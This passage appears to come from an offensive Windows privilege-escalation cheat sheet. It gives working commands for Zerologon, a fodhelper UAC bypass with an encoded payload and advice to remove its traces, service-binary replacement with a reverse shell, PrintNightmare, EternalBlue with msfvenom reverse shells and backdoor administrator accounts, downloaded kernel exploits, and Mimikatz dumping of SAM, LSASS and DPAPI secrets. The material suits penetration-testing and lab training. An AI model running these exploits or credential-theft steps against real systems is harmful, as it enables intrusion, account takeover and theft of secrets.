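    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    $have  = @{}
    foreach ($p in $privs) { $have[$p.'Privilege Name'] = $p.State }

    $impersonate = $have.ContainsKey('SeImpersonatePrivilege')
    $assign      = $have.ContainsKey('SeAssignPrimaryTokenPrivilege')
    $build       = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber
    $spooler     = (Get-Service -Name Spooler -ErrorAction SilentlyContinue).Status -eq 'Running'

    $options = @()
    if ($impersonate -or $assign) {
        # original JuicyPotato relies on the BITS OXID trick, removed in 1809 / Server 2019
        if ($build -lt 17763) { $options += 'JuicyPotato (-t * -c {CLSID} -p <bat> -l <port>)' }
        $options += 'JuicyPotatoNG (-t * -p <bat>)'
        $options += 'RoguePotato (-r <attacker> -l <port>; attacker must answer on tcp/135)'
        if ($spooler) { $options += 'PrintSpoofer (-i -c <cmd>; needs the Spooler service)' }
    }
    [pscustomobject]@{
        SeImpersonatePrivilege        = if ($impersonate) { $have['SeImpersonatePrivilege'] } else { 'absent' }
        SeAssignPrimaryTokenPrivilege = if ($assign) { $have['SeAssignPrimaryTokenPrivilege'] } else { 'absent' }
        Build                         = $build
        SpoolerRunning                = $spooler
        Candidates                    = if ($options) { $options -join '; ' } else { 'none: no impersonation privilege on this token' }
    }
}

Select-PotatoVariant
```

Service accounts (IIS application pools, MSSQL, scheduled tasks running as NETWORK SERVICE) are where SeImpersonatePrivilege normally shows up; an ordinary interactive user will report "absent" for both and none of these tools will help.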

03.5 Zerologon (CVE-2020-1472)

git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
## Sets the DC machine account password to empty. This breaks replication and the DC's trust, so restore it (restorepassword.py in the same repo) when you are done
python3 cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179

# If the exploit completes, dump the domain using the now-empty machine account password
impacket-secretsdump -just-dc -no-pass MULTIMASTER\$@10.10.10.179

# Now you can log in with the dumped Administrator hash (format LM:NT)
# '$' marks a machine account
impacket-psexec Administrator@10.10.10.179 -hashes 69cbf4a9b7415c9e1caf93d51d971be0:69cbf4a9b7415c9e1caf93d51d971be0

03.6 Fodhelper UAC Bypass

## ------------------| CMD (fodhelper.exe auto-elevates and resolves the ms-settings handler from HKCU, which we control)
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS==" /f
C:\Windows\System32\fodhelper.exe

## ------------------| Powershell
$program = "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS=="
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

## ------------------| Remove (the key is a well-known IOC; clean it up once the elevated shell is back)
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
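Added example, not part of the original notes, for this section and for the "member of Administrators, but still stuck" item in 01.2: both tricks only matter for a UAC-filtered admin token, so check the preconditions before writing anything to HKCU. The function distinguishes "in Administrators" (the group SID is in the token) from "elevated" (IsInRole, which is false on a filtered token because the SID is flagged deny-only) and reads the UAC policy values from their real location under HKLM. The verdict strings are this example's own; the value semantics (ConsentPromptBehaviorAdmin 2 = Always notify, which disables the auto-elevation fodhelper relies on; 5 = default) are Microsoft's.

```powershell
# Added example (not from the original notes): is this token a candidate for a UAC bypass?
function Test-FilteredAdminToken {
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $prin = New-Object Security.Principal.WindowsPrincipal($id)
    # In a filtered token the Administrators SID is still present but marked deny-only,
    # so Groups contains it while IsInRole returns $false: that combination is the target state.
    $inAdmins = @($id.Groups | ForEach-Object { $_.Value }) -contains 'S-1-5-32-544'
    $elevated = $prin.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    $uac     = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $consent = [int]$uac.ConsentPromptBehaviorAdmin   # 5 = default, 2 = always notify, 0 = never notify

    $verdict = if ($elevated)          { 'already elevated, nothing to bypass' }
               elseif (-not $inAdmins) { 'not in Administrators: a UAC bypass cannot help, escalate first' }
               elseif ($consent -eq 2) { 'Always notify: fodhelper will prompt; try the \\127.0.0.1\c$ route instead' }
               else                    { 'filtered admin token with auto-elevation allowed: fodhelper should work' }

    [pscustomobject]@{
        User                       = $id.Name
        InAdministrators           = $inAdmins
        Elevated                   = $elevated
        EnableLUA                  = $uac.EnableLUA
        ConsentPromptBehaviorAdmin = $consent
        Verdict                    = $verdict
    }
}

Test-FilteredAdminToken
```

The same output is what to record in a report: a bypass that "did not work" almost always means one of these three values was not what the trick assumes.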

03.7 Serviio Insecure File Permissions

## ------------------| Enumeration
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr Serviio
icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # Check if we have BUILTIN\Users:(I)(F)

## ------------------| Exploit
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move revshell.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
net stop Serviio && net start Serviio
## or, if we cannot restart the service ourselves, reboot (StartMode must be Auto)
wmic service where caption="Serviio" get name, caption, state, startmode
whoami /priv | findstr SeShutdownPrivilege ## "Disabled" is fine, shutdown.exe enables it itself
shutdown /r /t 0

03.8 PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

## ------------------| Verify vulnerability (the Spooler exposes the MS-RPRN interface)
impacket-rpcdump @<IP> | grep -A2 -B2 MS-RPRN

## ------------------| Download and execute (local variant: loads a driver DLL through the Spooler and, by default, creates the local admin adm1n:P@ssw0rd)
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare
## If you get errors such as ExecutionPolicy, load it through evil-winrm's script path instead
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD> -s $(pwd)
CVE-2021-1675.ps1
menu
Invoke-Nightmare

## Then use psexec to log in with the new creds
impacket-psexec adm1n:'P@ssw0rd'@<IP>

03.9 EternalBlue (MS17-010)

## ------------------| Check
nmap -sV -Pn -p 445 --script smb-vuln-ms17-010 $IP

## ------------------| Setup
git clone https://github.com/helviojunior/MS17-010.git && cd MS17-010
virtualenv -p python2 venv
source venv/bin/activate
pip2 install impacket pycrypto # pip may complain about newer dependencies; that is fine as long as checker.py runs
python checker.py <IP>
msfvenom -p windows/shell_reverse_tcp LHOST=<YourIP> LPORT=4545 -f exe > rev.exe

## ------------------| Method I
python send_and_execute.py <IP> rev.exe

## ------------------| Method II
## Open zzz_exploit.py file and edit following lines
service_exec(conn, r'cmd /c net user h4rithd Password123 /add')
service_exec(conn, r'cmd /c net localgroup administrators h4rithd /add')
python zzz_exploit.py <IP>

03.10 WES-NG (Windows Exploit Suggester - Next Generation)

## ------------------| Install
git clone https://github.com/bitsadmin/wesng.git
cd wesng
chmod +x wes.py

## ------------------| Download latest definitions
./wes.py --update
./wes.py -u

## ------------------| Download latest version of WES-NG
./wes.py --update-wes

## ------------------| Determine vulnerabilities (collect the input on the target with: systeminfo > systeminfo.txt)
./wes.py systeminfo.txt

## ------------------| Determine vulnerabilities using both systeminfo and qfe files
./wes.py systeminfo.txt qfe.txt

## ------------------| Determine vulnerabilities and output to file
./wes.py systeminfo.txt --output vulns.csv
./wes.py systeminfo.txt -o vulns.csv

## ------------------| Determine vulnerabilities explicitly specifying KBs to reduce false-positives
./wes.py systeminfo.txt --patches KB4345421 KB4487017
./wes.py systeminfo.txt -p KB4345421 KB4487017

## ------------------| Determine vulnerabilities, filtering out vulnerabilities of KBs published before the publishing date of the most recent installed KB
./wes.py systeminfo.txt --usekbdate
./wes.py systeminfo.txt -d

## ------------------| Determine vulnerabilities explicitly specifying definitions file
./wes.py systeminfo.txt --definitions C:\tmp\mydefs.zip

## ------------------| List only vulnerabilities with exploits, excluding IE, Edge and Flash
./wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
./wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash

## ------------------| Only show vulnerabilities of a certain impact
./wes.py systeminfo.txt --impact "Remote Code Execution"
./wes.py systeminfo.txt -i "Remote Code Execution"

## ------------------| Only show vulnerabilities of a certain severity
./wes.py systeminfo.txt --severity critical
./wes.py systeminfo.txt -s critical

## ------------------| Validate supersedence against Microsoft's online Update Catalog
./wes.py systeminfo.txt --muc-lookup

03.11 Windows Kernel Exploits

Download all the binary files from: https://github.com/SecWiki/windows-kernel-exploits

Microsoft Windows - Local Privilege Escalation (MS15-051)

wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip

USBPcap Null Pointer Dereference Privilege Escalation (CVE-2017-6178)

## ------------------| Information
# Date             - 07th March 2017
# Discovered by    - Parvez Anwar (@parvezghh)
# Vendor Homepage  - http://desowin.org/usbpcap/ 
# Tested Version   - 1.1.0.0  (USB Packet capture for Windows bundled with WireShark 2.2.5)
# Driver Version   - 1.1.0.0 - USBPcap.sys
# Tested on OS     - 32bit Windows 7 SP1 
# Vendor fix url   - not yet
# Fixed Version    - 0day
# Fixed driver ver - 0day

## ------------------| Check vulnerable version
driverquery /v | findstr USBPcap.sys
type "C:\Program Files\USBPcap\USBPcap.inf"

## ------------------| Exploit (build a 32-bit binary; the exploit targets 32-bit Windows 7)
curl -o exploit.c https://www.exploit-db.com/raw/41542
gcc exploit.c -o exploit.exe
.\exploit.exe

03.12 Mimikatz

  • Dump all users' NTLM hashes from the SAM and logon secrets from LSASS (needs local admin / SeDebugPrivilege)

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-logonpasswords.out

## ------------------| If you only have an LSASS minidump (or a Rekall image), parse it offline with pypykatz
pip3 install pypykatz
pypykatz lsa minidump lsass.DMP --json
  • Set an account's password by writing its NTLM hash (resets the password; needs rights to reset that account)

.\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit"
  • Decrypt an EFS-encrypted file (export the user's certificate and DPAPI-protected private key, then rebuild the PFX)

## ------------------| Get the file's certificate thumbprint
cipher /c c:\users\file.txt | Select-String "Certificate thumbprint"
## Also you can get this using following command.
dir C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ | Select Name  

## ------------------| Getting the certificate
.\mimikatz.exe "crypto::system /file:C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<Certificate_Thumbprint> /export" "exit"    
## Download the *.der file to your machine.

## ------------------| Getting the masterkey
gci C:\Users\tolu\AppData\Roaming\Microsoft\protect\
gci -hidden C:\Users\tolu\AppData\Roaming\Microsoft\protect\<SID_VALUE>\
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\protect\<SID_VALUE>\<FileName> /password:<UserPassword>" "exit"     

## ------------------| Decrypting the private key
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\
.\mimikatz.exe "dpapi::capi /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\<FILE> /masterkey:<SHA-1>" "exit"
## Download the *.pvk file to your machine.

## ------------------| Building & Installing the correct PFX
openssl x509 -inform DER -outform PEM -in *.der -out public.pem
openssl rsa -inform PVK -outform PEM -in *.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:<NewPassword> -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx       
## Copy the cert.pfx file to remote machine.
certutil -user -p <NewPassword> -importpfx cert.pfx NoChain,NoRoot

## ------------------| Data access (the file now decrypts transparently for the user who imported the PFX)
type "c:\users\file.txt"
